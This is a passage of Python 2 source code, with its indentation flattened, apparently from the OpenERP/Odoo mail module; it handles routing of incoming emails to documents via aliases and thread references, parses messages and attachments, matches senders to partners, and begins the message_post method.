return ('mail', 'action_mail_inbox_feeds')
def message_redirect_action(self, cr, uid, context=None):
""" For a given message, return an action that either
- opens the form view of the related document if model, res_id, and
read access to the document
- opens the Inbox with a default search on the conversation if model,
res_id
- opens the Inbox with context propagated
"""
if context is None:
context = {}
# default action is the Inbox action
self.pool.get('res.users').browse(cr, SUPERUSER_ID, uid, context=context)
act_model, act_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, *self._get_inbox_action_xml_id(cr, uid, context=context))
action = self.pool.get(act_model).read(cr, uid, act_id, [])
params = context.get('params')
msg_id = model = res_id = None
if params:
msg_id = params.get('message_id')
model = params.get('model')
res_id = params.get('res_id')
if not msg_id and not (model and res_id):
return action
if msg_id and not (model and res_id):
msg = self.pool.get('mail.message').browse(cr, uid, msg_id, context=context)
if msg.exists():
model, res_id = msg.model, msg.res_id
# if model + res_id found: try to redirect to the document or fallback on the Inbox
if model and res_id:
model_obj = self.pool.get(model)
if model_obj.check_access_rights(cr, uid, 'read', raise_exception=False):
try:
model_obj.check_access_rule(cr, uid, [res_id], 'read', context=context)
if not hasattr(model_obj, '_get_formview_action'):
action = self.pool.get('mail.thread')._get_formview_action(cr, uid, res_id, model=model, context=context)
else:
action = model_obj._get_formview_action(cr, uid, res_id, context=context)
except (osv.except_osv, orm.except_orm):
pass
action.update({
'context': {
'search_default_model': model,
'search_default_res_id': res_id,
}
})
return action
#------------------------------------------------------
# Email specific
#------------------------------------------------------
def message_get_reply_to(self, cr, uid, ids, context=None):
""" Returns the preferred reply-to email address that is basically
the alias of the document, if it exists. """
if not self._inherits.get('mail.alias'):
return [False for id in ids]
return ["%s@%s" % (record['alias_name'], record['alias_domain'])
if record.get('alias_domain') and record.get('alias_name')
else False
for record in self.read(cr, SUPERUSER_ID, ids, ['alias_name', 'alias_domain'], context=context)]
#------------------------------------------------------
# Mail gateway
#------------------------------------------------------
def message_capable_models(self, cr, uid, context=None):
""" Used by the plugin addon, based for plugin_outlook and others. """
ret_dict = {}
for model_name in self.pool.obj_list():
model = self.pool[model_name]
if hasattr(model, "message_process") and hasattr(model, "message_post"):
ret_dict[model_name] = model._description
return ret_dict
def _message_find_partners(self, cr, uid, message, header_fields=['From'], context=None):
""" Find partners related to some header fields of the message.
:param string message: an email.message instance """
s = ', '.join([decode(message.get(h)) for h in header_fields if message.get(h)])
return filter(lambda x: x, self._find_partner_from_emails(cr, uid, None, tools.email_split(s), context=context))
def message_route_verify(self, cr, uid, message, message_dict, route, update_author=True, assert_model=True, create_fallback=True, context=None):
""" Verify route validity. Check and rules:
1 - if thread_id -> check that document effectively exists; otherwise
fallback on a message_new by resetting thread_id
2 - check that message_update exists if thread_id is set; or at least
that message_new exist
[ - find author_id if udpate_author is set]
3 - if there is an alias, check alias_contact:
'followers' and thread_id:
check on target document that the author is in the followers
'followers' and alias_parent_thread_id:
check on alias parent document that the author is in the
followers
'partners': check that author_id id set
"""
assert isinstance(route, (list, tuple)), 'A route should be a list or a tuple'
assert len(route) == 5, 'A route should contain 5 elements: model, thread_id, custom_values, uid, alias record'
message_id = message.get('Message-Id')
email_from = decode_header(message, 'From')
author_id = message_dict.get('author_id')
model, thread_id, alias = route[0], route[1], route[4]
model_pool = None
def _create_bounce_email():
mail_mail = self.pool.get('mail.mail')
mail_id = mail_mail.create(cr, uid, {
'body_html': '<div><p>Hello,</p>'
'<p>The following email sent to %s cannot be accepted because this is '
'a private email address. Only allowed people can contact us at this address.</p></div>'
'<blockquote>%s</blockquote>' % (message.get('to'), message_dict.get('body')),
'subject': 'Re: %s' % message.get('subject'),
'email_to': message.get('from'),
'auto_delete': True,
}, context=context)
mail_mail.send(cr, uid, [mail_id], context=context)
def _warn(message):
_logger.warning('Routing mail with Message-Id %s: route %s: %s',
message_id, route, message)
# Wrong model
if model and not model in self.pool:
if assert_model:
assert model in self.pool, 'Routing: unknown target model %s' % model
_warn('unknown target model %s' % model)
return ()
elif model:
model_pool = self.pool[model]
# Private message: should not contain any thread_id
if not model and thread_id:
if assert_model:
assert thread_id == 0, 'Routing: posting a message without model should be with a null res_id (private message), received %s.' % thread_id
_warn('posting a message without model should be with a null res_id (private message), received %s, resetting thread_id' % thread_id)
thread_id = 0
# Private message: should have a parent_id (only answers)
if not model and not message_dict.get('parent_id'):
if assert_model:
assert message_dict.get('parent_id'), 'Routing: posting a message without model should be with a parent_id (private mesage).'
_warn('posting a message without model should be with a parent_id (private mesage), skipping')
return ()
# Existing Document: check if exists; if not, fallback on create if allowed
if thread_id and not model_pool.exists(cr, uid, thread_id):
if create_fallback:
_warn('reply to missing document (%s,%s), fall back on new document creation' % (model, thread_id))
thread_id = None
elif assert_model:
assert model_pool.exists(cr, uid, thread_id), 'Routing: reply to missing document (%s,%s)' % (model, thread_id)
else:
_warn('reply to missing document (%s,%s), skipping' % (model, thread_id))
return ()
# Existing Document: check model accepts the mailgateway
if thread_id and model and not hasattr(model_pool, 'message_update'):
if create_fallback:
_warn('model %s does not accept document update, fall back on document creation' % model)
thread_id = None
elif assert_model:
assert hasattr(model_pool, 'message_update'), 'Routing: model %s does not accept document update, crashing' % model
else:
_warn('model %s does not accept document update, skipping' % model)
return ()
# New Document: check model accepts the mailgateway
if not thread_id and model and not hasattr(model_pool, 'message_new'):
if assert_model:
assert hasattr(model_pool, 'message_new'), 'Model %s does not accept document creation, crashing' % model
_warn('model %s does not accept document creation, skipping' % model)
return ()
# Update message author if asked
# We do it now because we need it for aliases (contact settings)
if not author_id and update_author:
author_ids = self._find_partner_from_emails(cr, uid, thread_id, [email_from], model=model, context=context)
if author_ids:
author_id = author_ids[0]
message_dict['author_id'] = author_id
# Alias: check alias_contact settings
if alias and alias.alias_contact == 'followers' and (thread_id or alias.alias_parent_thread_id):
if thread_id:
obj = self.pool[model].browse(cr, uid, thread_id, context=context)
else:
obj = self.pool[alias.alias_parent_model_id.model].browse(cr, uid, alias.alias_parent_thread_id, context=context)
if not author_id or not author_id in [fol.id for fol in obj.message_follower_ids]:
_warn('alias %s restricted to internal followers, skipping' % alias.alias_name)
_create_bounce_email()
return ()
elif alias and alias.alias_contact == 'partners' and not author_id:
_warn('alias %s does not accept unknown author, skipping' % alias.alias_name)
_create_bounce_email()
return ()
return (model, thread_id, route[2], route[3], route[4])
def message_route(self, cr, uid, message, message_dict, model=None, thread_id=None,
custom_values=None, context=None):
"""Attempt to figure out the correct target model, thread_id,
custom_values and user_id to use for an incoming message.
Multiple values may be returned, if a message had multiple
recipients matching existing mail.aliases, for example.
The following heuristics are used, in this order:
1. If the message replies to an existing thread_id, and
properly contains the thread model in the 'In-Reply-To'
header, use this model/thread_id pair, and ignore
custom_value (not needed as no creation will take place)
2. Look for a mail.alias entry matching the message
recipient, and use the corresponding model, thread_id,
custom_values and user_id.
3. Fallback to the ``model``, ``thread_id`` and ``custom_values``
provided.
4. If all the above fails, raise an exception.
:param string message: an email.message instance
:param dict message_dict: dictionary holding message variables
:param string model: the fallback model to use if the message
does not match any of the currently configured mail aliases
(may be None if a matching alias is supposed to be present)
:type dict custom_values: optional dictionary of default field values
to pass to ``message_new`` if a new record needs to be created.
Ignored if the thread record already exists, and also if a
matching mail.alias was found (aliases define their own defaults)
:param int thread_id: optional ID of the record/thread from ``model``
to which this mail should be attached. Only used if the message
does not reply to an existing thread and does not match any mail alias.
:return: list of [model, thread_id, custom_values, user_id, alias]
"""
assert isinstance(message, Message), 'message must be an email.message.Message at this point'
mail_msg_obj = self.pool['mail.message']
fallback_model = model
# Get email.message.Message variables for future processing
message_id = message.get('Message-Id')
email_from = decode_header(message, 'From')
email_to = decode_header(message, 'To')
references = decode_header(message, 'References')
in_reply_to = decode_header(message, 'In-Reply-To')
thread_references = references or in_reply_to
# 1. message is a reply to an existing message (exact match of message_id)
msg_references = thread_references.split()
mail_message_ids = mail_msg_obj.search(cr, uid, [('message_id', 'in', msg_references)], context=context)
if mail_message_ids:
original_msg = mail_msg_obj.browse(cr, SUPERUSER_ID, mail_message_ids[0], context=context)
model, thread_id = original_msg.model, original_msg.res_id
_logger.info(
'Routing mail from %s to %s with Message-Id %s: direct reply to msg: model: %s, thread_id: %s, custom_values: %s, uid: %s',
email_from, email_to, message_id, model, thread_id, custom_values, uid)
route = self.message_route_verify(
cr, uid, message, message_dict,
(model, thread_id, custom_values, uid, None),
update_author=True, assert_model=True, create_fallback=True, context=context)
return route and [route] or []
# 2. message is a reply to an existign thread (6.1 compatibility)
ref_match = thread_references and tools.reference_re.search(thread_references)
if ref_match:
thread_id = int(ref_match.group(1))
model = ref_match.group(2) or fallback_model
if thread_id and model in self.pool:
model_obj = self.pool[model]
compat_mail_msg_ids = mail_msg_obj.search(
cr, uid, [
('message_id', '=', False),
('model', '=', model),
('res_id', '=', thread_id),
], context=context)
if compat_mail_msg_ids and model_obj.exists(cr, uid, thread_id) and hasattr(model_obj, 'message_update'):
_logger.info(
'Routing mail from %s to %s with Message-Id %s: direct thread reply (compat-mode) to model: %s, thread_id: %s, custom_values: %s, uid: %s',
email_from, email_to, message_id, model, thread_id, custom_values, uid)
route = self.message_route_verify(
cr, uid, message, message_dict,
(model, thread_id, custom_values, uid, None),
update_author=True, assert_model=True, create_fallback=True, context=context)
return route and [route] or []
# 2. Reply to a private message
if in_reply_to:
mail_message_ids = mail_msg_obj.search(cr, uid, [
('message_id', '=', in_reply_to),
'!', ('message_id', 'ilike', 'reply_to')
], limit=1, context=context)
if mail_message_ids:
mail_message = mail_msg_obj.browse(cr, uid, mail_message_ids[0], context=context)
_logger.info('Routing mail from %s to %s with Message-Id %s: direct reply to a private message: %s, custom_values: %s, uid: %s',
email_from, email_to, message_id, mail_message.id, custom_values, uid)
route = self.message_route_verify(cr, uid, message, message_dict,
(mail_message.model, mail_message.res_id, custom_values, uid, None),
update_author=True, assert_model=True, create_fallback=True, context=context)
return route and [route] or []
# 3. Look for a matching mail.alias entry
# Delivered-To is a safe bet in most modern MTAs, but we have to fallback on To + Cc values
# for all the odd MTAs out there, as there is no standard header for the envelope's `rcpt_to` value.
rcpt_tos = \
','.join([decode_header(message, 'Delivered-To'),
decode_header(message, 'To'),
decode_header(message, 'Cc'),
decode_header(message, 'Resent-To'),
decode_header(message, 'Resent-Cc')])
local_parts = [e.split('@')[0] for e in tools.email_split(rcpt_tos)]
if local_parts:
mail_alias = self.pool.get('mail.alias')
alias_ids = mail_alias.search(cr, uid, [('alias_name', 'in', local_parts)])
if alias_ids:
routes = []
for alias in mail_alias.browse(cr, uid, alias_ids, context=context):
user_id = alias.alias_user_id.id
if not user_id:
# TDE note: this could cause crashes, because no clue that the user
# that send the email has the right to create or modify a new document
# Fallback on user_id = uid
# Note: recognized partners will be added as followers anyway
# user_id = self._message_find_user_id(cr, uid, message, context=context)
user_id = uid
_logger.info('No matching user_id for the alias %s', alias.alias_name)
route = (alias.alias_model_id.model, alias.alias_force_thread_id, eval(alias.alias_defaults), user_id, alias)
_logger.info('Routing mail from %s to %s with Message-Id %s: direct alias match: %r',
email_from, email_to, message_id, route)
route = self.message_route_verify(cr, uid, message, message_dict, route,
update_author=True, assert_model=True, create_fallback=True, context=context)
if route:
routes.append(route)
return routes
# 4. Fallback to the provided parameters, if they work
if not thread_id:
# Legacy: fallback to matching [ID] in the Subject
match = tools.res_re.search(decode_header(message, 'Subject'))
thread_id = match and match.group(1)
# Convert into int (bug spotted in 7.0 because of str)
try:
thread_id = int(thread_id)
except:
thread_id = False
_logger.info('Routing mail from %s to %s with Message-Id %s: fallback to model:%s, thread_id:%s, custom_values:%s, uid:%s',
email_from, email_to, message_id, fallback_model, thread_id, custom_values, uid)
route = self.message_route_verify(cr, uid, message, message_dict,
(fallback_model, thread_id, custom_values, uid, None),
update_author=True, assert_model=True, context=context)
if route:
return [route]
# AssertionError if no routes found and if no bounce occured
assert False, \
"No possible route found for incoming message from %s to %s (Message-Id %s:)." \
"Create an appropriate mail.alias or force the destination model." % (email_from, email_to, message_id)
def message_route_process(self, cr, uid, message, message_dict, routes, context=None):
# postpone setting message_dict.partner_ids after message_post, to avoid double notifications
partner_ids = message_dict.pop('partner_ids', [])
thread_id = False
for model, thread_id, custom_values, user_id, alias in routes:
if self._name == 'mail.thread':
context.update({'thread_model': model})
if model:
model_pool = self.pool[model]
assert thread_id and hasattr(model_pool, 'message_update') or hasattr(model_pool, 'message_new'), \
"Undeliverable mail with Message-Id %s, model %s does not accept incoming emails" % \
(message_dict['message_id'], model)
# disabled subscriptions during message_new/update to avoid having the system user running the
# email gateway become a follower of all inbound messages
nosub_ctx = dict(context, mail_create_nosubscribe=True, mail_create_nolog=True)
if thread_id and hasattr(model_pool, 'message_update'):
model_pool.message_update(cr, user_id, [thread_id], message_dict, context=nosub_ctx)
else:
thread_id = model_pool.message_new(cr, user_id, message_dict, custom_values, context=nosub_ctx)
else:
assert thread_id == 0, "Posting a message without model should be with a null res_id, to create a private message."
model_pool = self.pool.get('mail.thread')
if not hasattr(model_pool, 'message_post'):
context['thread_model'] = model
model_pool = self.pool['mail.thread']
new_msg_id = model_pool.message_post(cr, uid, [thread_id], context=context, subtype='mail.mt_comment', **message_dict)
if partner_ids:
# postponed after message_post, because this is an external message and we don't want to create
# duplicate emails due to notifications
self.pool.get('mail.message').write(cr, uid, [new_msg_id], {'partner_ids': partner_ids}, context=context)
return thread_id
def message_process(self, cr, uid, model, message, custom_values=None,
save_original=False, strip_attachments=False,
thread_id=None, context=None):
""" Process an incoming RFC2822 email message, relying on
``mail.message.parse()`` for the parsing operation,
and ``message_route()`` to figure out the target model.
Once the target model is known, its ``message_new`` method
is called with the new message (if the thread record did not exist)
or its ``message_update`` method (if it did).
There is a special case where the target model is False: a reply
to a private message. In this case, we skip the message_new /
message_update step, to just post a new message using mail_thread
message_post.
:param string model: the fallback model to use if the message
does not match any of the currently configured mail aliases
(may be None if a matching alias is supposed to be present)
:param message: source of the RFC2822 message
:type message: string or xmlrpclib.Binary
:type dict custom_values: optional dictionary of field values
to pass to ``message_new`` if a new record needs to be created.
Ignored if the thread record already exists, and also if a
matching mail.alias was found (aliases define their own defaults)
:param bool save_original: whether to keep a copy of the original
email source attached to the message after it is imported.
:param bool strip_attachments: whether to strip all attachments
before processing the message, in order to save some space.
:param int thread_id: optional ID of the record/thread from ``model``
to which this mail should be attached. When provided, this
overrides the automatic detection based on the message
headers.
"""
if context is None:
context = {}
# extract message bytes - we are forced to pass the message as binary because
# we don't know its encoding until we parse its headers and hence can't
# convert it to utf-8 for transport between the mailgate script and here.
if isinstance(message, xmlrpclib.Binary):
message = str(message.data)
# Warning: message_from_string doesn't always work correctly on unicode,
# we must use utf-8 strings here :-(
if isinstance(message, unicode):
message = message.encode('utf-8')
msg_txt = email.message_from_string(message)
# parse the message, verify we are not in a loop by checking message_id is not duplicated
msg = self.message_parse(cr, uid, msg_txt, save_original=save_original, context=context)
if strip_attachments:
msg.pop('attachments', None)
if msg.get('message_id'): # should always be True as message_parse generate one if missing
existing_msg_ids = self.pool.get('mail.message').search(cr, SUPERUSER_ID, [
('message_id', '=', msg.get('message_id')),
], context=context)
if existing_msg_ids:
_logger.info('Ignored mail from %s to %s with Message-Id %s: found duplicated Message-Id during processing',
msg.get('from'), msg.get('to'), msg.get('message_id'))
return False
# find possible routes for the message
routes = self.message_route(cr, uid, msg_txt, msg, model, thread_id, custom_values, context=context)
thread_id = self.message_route_process(cr, uid, msg_txt, msg, routes, context=context)
return thread_id
def message_new(self, cr, uid, msg_dict, custom_values=None, context=None):
"""Called by ``message_process`` when a new message is received
for a given thread model, if the message did not belong to
an existing thread.
The default behavior is to create a new record of the corresponding
model (based on some very basic info extracted from the message).
Additional behavior may be implemented by overriding this method.
:param dict msg_dict: a map containing the email details and
attachments. See ``message_process`` and
``mail.message.parse`` for details.
:param dict custom_values: optional dictionary of additional
field values to pass to create()
when creating the new thread record.
Be careful, these values may override
any other values coming from the message.
:param dict context: if a ``thread_model`` value is present
in the context, its value will be used
to determine the model of the record
to create (instead of the current model).
:rtype: int
:return: the id of the newly created thread object
"""
if context is None:
context = {}
data = {}
if isinstance(custom_values, dict):
data = custom_values.copy()
model = context.get('thread_model') or self._name
model_pool = self.pool[model]
fields = model_pool.fields_get(cr, uid, context=context)
if 'name' in fields and not data.get('name'):
data['name'] = msg_dict.get('subject', '')
res_id = model_pool.create(cr, uid, data, context=context)
return res_id
def message_update(self, cr, uid, ids, msg_dict, update_vals=None, context=None):
"""Called by ``message_process`` when a new message is received
for an existing thread. The default behavior is to update the record
with update_vals taken from the incoming email.
Additional behavior may be implemented by overriding this
method.
:param dict msg_dict: a map containing the email details and
attachments. See ``message_process`` and
``mail.message.parse()`` for details.
:param dict update_vals: a dict containing values to update records
given their ids; if the dict is None or is
void, no write operation is performed.
"""
if update_vals:
self.write(cr, uid, ids, update_vals, context=context)
return True
def _message_extract_payload(self, message, save_original=False):
"""Extract body as HTML and attachments from the mail message"""
attachments = []
body = u''
if save_original:
attachments.append(('original_email.eml', message.as_string()))
if not message.is_multipart() or 'text/' in message.get('content-type', ''):
encoding = message.get_content_charset()
body = message.get_payload(decode=True)
body = tools.ustr(body, encoding, errors='replace')
if message.get_content_type() == 'text/plain':
# text/plain -> <pre/>
body = tools.append_content_to_html(u'', body, preserve=True)
else:
alternative = False
for part in message.walk():
if part.get_content_type() == 'multipart/alternative':
alternative = True
if part.get_content_maintype() == 'multipart':
continue # skip container
# part.get_filename returns decoded value if able to decode, coded otherwise.
# original get_filename is not able to decode iso-8859-1 (for instance).
# therefore, iso encoded attachements are not able to be decoded properly with get_filename
# code here partially copy the original get_filename method, but handle more encoding
filename=part.get_param('filename', None, 'content-disposition')
if not filename:
filename=part.get_param('name', None)
if filename:
if isinstance(filename, tuple):
# RFC2231
filename=email.utils.collapse_rfc2231_value(filename).strip()
else:
filename=decode(filename)
encoding = part.get_content_charset() # None if attachment
# 1) Explicit Attachments -> attachments
if filename or part.get('content-disposition', '').strip().startswith('attachment'):
attachments.append((filename or 'attachment', part.get_payload(decode=True)))
continue
# 2) text/plain -> <pre/>
if part.get_content_type() == 'text/plain' and (not alternative or not body):
body = tools.append_content_to_html(body, tools.ustr(part.get_payload(decode=True),
encoding, errors='replace'), preserve=True)
# 3) text/html -> raw
elif part.get_content_type() == 'text/html':
html = tools.ustr(part.get_payload(decode=True), encoding, errors='replace')
if alternative:
body = html
else:
body = tools.append_content_to_html(body, html, plaintext=False)
# 4) Anything else -> attachment
else:
attachments.append((filename or 'attachment', part.get_payload(decode=True)))
return body, attachments
def message_parse(self, cr, uid, message, save_original=False, context=None):
"""Parses a string or email.message.Message representing an
RFC-2822 email, and returns a generic dict holding the
message details.
:param message: the message to parse
:type message: email.message.Message | string | unicode
:param bool save_original: whether the returned dict
should include an ``original`` attachment containing
the source of the message
:rtype: dict
:return: A dict with the following structure, where each
field may not be present if missing in original
message::
{ 'message_id': msg_id,
'subject': subject,
'from': from,
'to': to,
'cc': cc,
'body': unified_body,
'attachments': [('file1', 'bytes'),
('file2', 'bytes')}
}
"""
msg_dict = {
'type': 'email',
}
if not isinstance(message, Message):
if isinstance(message, unicode):
# Warning: message_from_string doesn't always work correctly on unicode,
# we must use utf-8 strings here :-(
message = message.encode('utf-8')
message = email.message_from_string(message)
message_id = message['message-id']
if not message_id:
# Very unusual situation, be we should be fault-tolerant here
message_id = "<%s@localhost>" % time.time()
_logger.debug('Parsing Message without message-id, generating a random one: %s', message_id)
msg_dict['message_id'] = message_id
if message.get('Subject'):
msg_dict['subject'] = decode(message.get('Subject'))
# Envelope fields not stored in mail.message but made available for message_new()
msg_dict['from'] = decode(message.get('from'))
msg_dict['to'] = decode(message.get('to'))
msg_dict['cc'] = decode(message.get('cc'))
msg_dict['email_from'] = decode(message.get('from'))
partner_ids = self._message_find_partners(cr, uid, message, ['To', 'Cc'], context=context)
msg_dict['partner_ids'] = [(4, partner_id) for partner_id in partner_ids]
if message.get('Date'):
try:
date_hdr = decode(message.get('Date'))
parsed_date = dateutil.parser.parse(date_hdr, fuzzy=True)
if parsed_date.utcoffset() is None:
# naive datetime, so we arbitrarily decide to make it
# UTC, there's no better choice. Should not happen,
# as RFC2822 requires timezone offset in Date headers.
stored_date = parsed_date.replace(tzinfo=pytz.utc)
else:
stored_date = parsed_date.astimezone(tz=pytz.utc)
except Exception:
_logger.warning('Failed to parse Date header %r in incoming mail '
'with message-id %r, assuming current date/time.',
message.get('Date'), message_id)
stored_date = datetime.datetime.now()
msg_dict['date'] = stored_date.strftime(tools.DEFAULT_SERVER_DATETIME_FORMAT)
if message.get('In-Reply-To'):
parent_ids = self.pool.get('mail.message').search(cr, uid, [('message_id', '=', decode(message['In-Reply-To']))])
if parent_ids:
msg_dict['parent_id'] = parent_ids[0]
if message.get('References') and 'parent_id' not in msg_dict:
parent_ids = self.pool.get('mail.message').search(cr, uid, [('message_id', 'in',
[x.strip() for x in decode(message['References']).split()])])
if parent_ids:
msg_dict['parent_id'] = parent_ids[0]
msg_dict['body'], msg_dict['attachments'] = self._message_extract_payload(message, save_original=save_original)
return msg_dict
#------------------------------------------------------
# Note specific
#------------------------------------------------------
def log(self, cr, uid, id, message, secondary=False, context=None):
_logger.warning("log() is deprecated. As this module inherit from "\
"mail.thread, the message will be managed by this "\
"module instead of by the res.log mechanism. Please "\
"use mail_thread.message_post() instead of the "\
"now deprecated res.log.")
self.message_post(cr, uid, [id], message, context=context)
def _message_add_suggested_recipient(self, cr, uid, result, obj, partner=None, email=None, reason='', context=None):
""" Called by message_get_suggested_recipients, to add a suggested
recipient in the result dictionary. The form is :
partner_id, partner_name<partner_email> or partner_name, reason """
if email and not partner:
# get partner info from email
partner_info = self.message_partner_info_from_emails(cr, uid, obj.id, [email], context=context)[0]
if partner_info.get('partner_id'):
partner = self.pool.get('res.partner').browse(cr, SUPERUSER_ID, [partner_info['partner_id']], context=context)[0]
if email and email in [val[1] for val in result[obj.id]]: # already existing email -> skip
return result
if partner and partner in obj.message_follower_ids: # recipient already in the followers -> skip
return result
if partner and partner in [val[0] for val in result[obj.id]]: # already existing partner ID -> skip
return result
if partner and partner.email: # complete profile: id, name <email>
result[obj.id].append((partner.id, '%s<%s>' % (partner.name, partner.email), reason))
elif partner: # incomplete profile: id, name
result[obj.id].append((partner.id, '%s' % (partner.name), reason))
else: # unknown partner, we are probably managing an email address
result[obj.id].append((False, email, reason))
return result
def message_get_suggested_recipients(self, cr, uid, ids, context=None):
""" Returns suggested recipients for ids. Those are a list of
tuple (partner_id, partner_name, reason), to be managed by Chatter. """
result = dict.fromkeys(ids, list())
if self._all_columns.get('user_id'):
for obj in self.browse(cr, SUPERUSER_ID, ids, context=context): # SUPERUSER because of a read on res.users that would crash otherwise
if not obj.user_id or not obj.user_id.partner_id:
continue
self._message_add_suggested_recipient(cr, uid, result, obj, partner=obj.user_id.partner_id, reason=self._all_columns['user_id'].column.string, context=context)
return result
def _find_partner_from_emails(self, cr, uid, id, emails, model=None, context=None, check_followers=True):
""" Utility method to find partners from email addresses. The rules are :
1 - check in document (model | self, id) followers
2 - try to find a matching partner that is also an user
3 - try to find a matching partner
:param list emails: list of email addresses
:param string model: model to fetch related record; by default self
is used.
:param boolean check_followers: check in document followers
"""
partner_obj = self.pool['res.partner']
partner_ids = []
obj = None
if id and (model or self._name != 'mail.thread') and check_followers:
if model:
obj = self.pool[model].browse(cr, uid, id, context=context)
else:
obj = self.browse(cr, uid, id, context=context)
for contact in emails:
partner_id = False
email_address = tools.email_split(contact)
if not email_address:
partner_ids.append(partner_id)
continue
email_address = email_address[0]
# first try: check in document's followers
if obj:
for follower in obj.message_follower_ids:
if follower.email == email_address:
partner_id = follower.id
# second try: check in partners that are also users
if not partner_id:
ids = partner_obj.search(cr, SUPERUSER_ID, [
('email', 'ilike', email_address),
('user_ids', '!=', False)
], limit=1, context=context)
if ids:
partner_id = ids[0]
# third try: check in partners
if not partner_id:
ids = partner_obj.search(cr, SUPERUSER_ID, [
('email', 'ilike', email_address)
], limit=1, context=context)
if ids:
partner_id = ids[0]
partner_ids.append(partner_id)
return partner_ids
def message_partner_info_from_emails(self, cr, uid, id, emails, link_mail=False, context=None):
""" Convert a list of emails into a list partner_ids and a list
new_partner_ids. The return value is non conventional because
it is meant to be used by the mail widget.
:return dict: partner_ids and new_partner_ids """
mail_message_obj = self.pool.get('mail.message')
partner_ids = self._find_partner_from_emails(cr, uid, id, emails, context=context)
result = list()
for idx in range(len(emails)):
email_address = emails[idx]
partner_id = partner_ids[idx]
partner_info = {'full_name': email_address, 'partner_id': partner_id}
result.append(partner_info)
# link mail with this from mail to the new partner id
if link_mail and partner_info['partner_id']:
message_ids = mail_message_obj.search(cr, SUPERUSER_ID, [
'|',
('email_from', '=', email_address),
('email_from', 'ilike', '<%s>' % email_address),
('author_id', '=', False)
], context=context)
if message_ids:
mail_message_obj.write(cr, SUPERUSER_ID, message_ids, {'author_id': partner_info['partner_id']}, context=context)
return result
def _message_preprocess_attachments(self, cr, uid, attachments, attachment_ids, attach_model, attach_res_id, context=None):
""" Preprocess attachments for mail_thread.message_post() or mail_mail.create().
:param list attachments: list of attachment tuples in the form ``(name,content)``,
where content is NOT base64 encoded
:param list attachment_ids: a list of attachment ids, not in tomany command form
:param str attach_model: the model of the attachments parent record
:param integer attach_res_id: the id of the attachments parent record
"""
Attachment = self.pool['ir.attachment']
m2m_attachment_ids = []
if attachment_ids:
filtered_attachment_ids = Attachment.search(cr, SUPERUSER_ID, [
('res_model', '=', 'mail.compose.message'),
('create_uid', '=', uid),
('id', 'in', attachment_ids)], context=context)
if filtered_attachment_ids:
Attachment.write(cr, SUPERUSER_ID, filtered_attachment_ids, {'res_model': attach_model, 'res_id': attach_res_id}, context=context)
m2m_attachment_ids += [(4, id) for id in attachment_ids]
# Handle attachments parameter, that is a dictionary of attachments
for name, content in attachments:
if isinstance(content, unicode):
content = content.encode('utf-8')
data_attach = {
'name': name,
'datas': base64.b64encode(str(content)),
'datas_fname': name,
'description': name,
'res_model': attach_model,
'res_id': attach_res_id,
}
m2m_attachment_ids.append((0, 0, data_attach))
return m2m_attachment_ids
def message_post(self, cr, uid, thread_id, body='', subject=None, type='notification',
subtype=None, parent_id=False, attachments=None, context=None,
content_subtype='html', **kwargs):
""" Post a new message in an existing thread, returning the new
mail.message ID.
:param int thread_id: thread ID to post into, or list with one ID;
if False/0, mail.message model will also be set as False
:param str body: body of the message, usually raw HTML that will
be sanitized
:param str type: see mail_message.type field
:param str content_subtype:: if plaintext: convert body into html
:param int parent_id: handle reply to a previous message by adding the
parent partners to the message in case of private discussion
:param tuple(str,str) attachments or list id: list of attachment tuples in the form
``(name,content)``, where content is NOT base64 encoded
Extra keyword arguments will be used as default column values for the
new mail.message record. Special cases:
- attachment_ids: supposed not attached to any document; attach them
to the related document. Should only be set by Chatter.
:return int: ID of newly created mail.message
"""
if context is None:
context = {}
if attachments is None:
attachments = {}
mail_message = self.pool.get('mail.message')
ir_attachment = self.pool.get('ir.attachment')
assert (not thread_id) or \
isinstance(thread_id, (int, long)) or \
(isinstance(thread_id, (list, tuple)) and len(thread_id) == 1), \
"Invalid thread_id; should be 0, False, an ID or a list with one ID"
if isinstance(thread_id, (list, tuple)):
thread_id = thread_id[0]
# if we're processing a message directly coming from the gateway, the destination model was
# set in the context.
model = False
if thread_id:
model = context.get('thread_model', self._name) if self._name == 'mail.thread' else self._name
if model != self._name and hasattr(self.pool[model], 'message_post'):
del context['thread_model']
return self.pool[model].message_post(cr, uid, thread_id, body=body, subject=subject, type=type, subtype=subtype, parent_id=parent_id, attachments=attachments, context=context, content_subtype=content_subtype, **kwargs)
#0: Find the message's author, because we need it for private discussion
author_id = kwargs.get('author_id')
if author_id is None: # keep False values
author_id = self.pool.get('mail.message')._get_default_author(cr, uid, context=context)
# 1: Handle content subtype: if plaintext, converto into HTML
if content_subtype == 'plaintext':
body = tools.plaintext2html(body)
# 2: Private message: add recipients (recipients and author of parent message) - current author
# + legacy-code management (! we manage only 4 and 6 commands)
partner_ids = set()
kwargs_partner_ids = kwargs.pop('partner_ids', [])
for partner_id in kwargs_partner_ids:
if isinstance(partner_id, (list, tuple)) and partner_id[0] == 4 and len(partner_id) == 2:
partner_ids.add(partner_id[1])
if isinstance(partner_id, (list, tuple)) and partner_id[0] == 6 and len(partner_id) == 3:
partner_ids |= set(partner_id[2])
elif isinstance(partner_id, (int, long)):
partner_ids.add(partner_id)
else:
pass # we do not manage anything else
if parent_id and not model:
parent_message = mail_message.browse(cr, uid, parent_id, context=context)
private_followers = set([partner.id for partner in parent_message.partner_ids])
if parent_message.author_id:
private_followers.add(parent_message.author_id.id)
private_followers -= set([author_id])
partner_ids |= private_followers
# 3. Attachments
# - HACK TDE FIXME: Chatter: attachments linked to the document (not done JS-side), load the message
attachment_ids = self._message_preprocess_attachments(cr, uid, attachments, kwargs.pop('attachment_ids', []), model, thread_id, context)
# 4: mail.message.subtype
subtype_id = False
if subtype:
if '.' not in subtype:
subtype = 'mail.%s' % subtype
ref = self.pool.get('ir.model.data').get_object_reference(cr, uid, *subtype.split('.'))
subtype_id = ref and ref[1] or False
# automatically subscribe recipients if asked to
if context.get('mail_post_autofollow') and thread_id and partner_ids:
partner_to_subscribe = partner_ids
if context.get('mail_post_autofollow_partner_ids'):
partner_to_subscribe = filter(lambda item: item in context.get('mail_post_autofollow_partner_ids'), partner_ids)
self.message_subscribe(cr, uid, [thread_id], list(partner_to_subscribe), context=context)
# _mail_flat_thread: automatically set free messages to the first posted message
if self._mail_flat_thread and not parent_id and thread_id:
message_ids = mail_message.search(cr, uid, ['&', ('res_id', '=', thread_id), ('model', '=', model)], context=context, order="id ASC", limit=1)
parent_id = message_ids and message_ids[0] or False
